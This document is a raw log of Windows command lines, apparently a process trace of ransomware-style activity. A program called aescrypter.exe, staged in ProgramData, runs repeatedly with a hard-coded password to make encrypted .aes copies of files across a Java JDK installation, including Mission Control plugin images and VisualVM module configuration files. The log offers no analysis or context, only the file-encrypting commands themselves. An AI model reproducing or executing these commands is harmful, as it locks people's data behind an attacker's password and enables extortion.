"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

